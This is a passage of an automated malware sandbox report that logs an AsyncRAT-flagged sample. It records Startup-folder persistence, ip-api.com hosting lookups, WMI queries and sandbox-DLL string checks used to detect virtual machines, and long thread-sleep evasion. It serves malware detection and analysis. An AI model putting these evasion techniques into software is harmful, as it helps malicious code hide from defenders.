                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: Process Memory Space: coonfart.exe PID: 4320, type: MEMORYSTR
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: coonfart.exe, 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, 80BvHOM51j.exe, 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, coonfart.exe, 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, coonfart.exe, 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, Runtime Broker.2.dr, 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, coonfart.exe.0.drBinary or memory string: SBIEDLL.DLLQKJ381CET1MLBINVL5CVJWVPWKMSL4YN54KLCALZJQKDGOQWU8EFSJOGTRKEDLDH2G2IEACLDB3IUVETCPQSTNAAK4YDJFJSF2HQK0QTBVJN8XTIQH3UV2TFJ4WQV2ABZIAK11GPB164WX013HD2CHECDTZDENWU45ZZQQMZ9NFULLMB7PDYYI1J7CYUBJYQOTMRYHYO5T9OQQFDIRQF7CAVB89CCE2ELJ0GUEVQUV6HZH5RXWCNAFQ9W1WSKKHNVBKVRFRJHXGDQC8V3MUYRTIFUA8BFRAQT2HSWYKU3I56YKM2KMFCGUOH1VRACND3CHRDYAIYQICURH0NQVDXJKMATDADLKZYKTTJ43HM7PFUCVRAVQIXRDDLV8R6YKMY2AEG8FCOTWLAFNLJKCLQX2NLMEQST8LDDKK7WQBRQSXPHB5SHQU6Y0VCGF7ACNPTTKJQNX3PIOVNU4TX01CHU2RBRTBLOEB83OTT7WXU4LYHQ5NVJ5XIOSKWBUPH7KQ5Q13BXCMXLETRPUMHIMKO1QANTPEJM97TH1YQFY8GRPA4ZXPBKIQFUGAIRL6EAZQZGIRTMK3SYZCK86DMIROX4QVIXBSQXEE29L3CJXGINFO
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeMemory allocated: F60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeMemory allocated: 1AD50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeMemory allocated: C70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeMemory allocated: 1A640000 memory reserve | memory write watch
                        Source: C:\Users\Public\Runtime BrokerMemory allocated: 15D0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Runtime BrokerMemory allocated: 1B1A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599657Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599532Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599397Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599281Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599172Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599049Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598922Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598797Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598679Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598563Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598453Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598344Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598219Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598110Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597985Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597860Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597735Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597610Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597485Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597360Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597235Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 597110Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596985Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596610Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596485Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596360Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596235Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 596110Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595985Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595860Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595735Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595610Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595485Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595360Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595231Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595124Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 595016Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594903Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594797Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594688Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594563Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594454Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 594329Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Runtime BrokerThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWindow / User API: threadDelayed 7698Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWindow / User API: threadDelayed 2076Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4629Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5186Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6658Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3083Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5944
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3746
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7891
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599875s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599766s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599657s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599532s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599397s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599281s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599172s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -599049s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598922s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598797s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598679s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598563s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598453s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598344s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598219s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -598110s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597985s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597860s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597735s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597610s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597485s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597360s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597235s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -597110s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596985s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596860s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596735s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596610s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596485s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596360s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596235s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -596110s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595985s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595860s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595735s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595610s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595485s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595360s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595231s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595124s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -595016s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -594903s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -594797s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -594688s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -594563s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -594454s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7396Thread sleep time: -594329s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep count: 7891 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep count: 1599 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Users\Public\Runtime Broker TID: 7376Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2256Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Public\Runtime BrokerFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599657Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599532Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599397Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599281Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599172Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 599049Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598922Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598797Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598679Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598563Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598453Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598344Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeThread delayed: delay time: 598219Jump to behavior
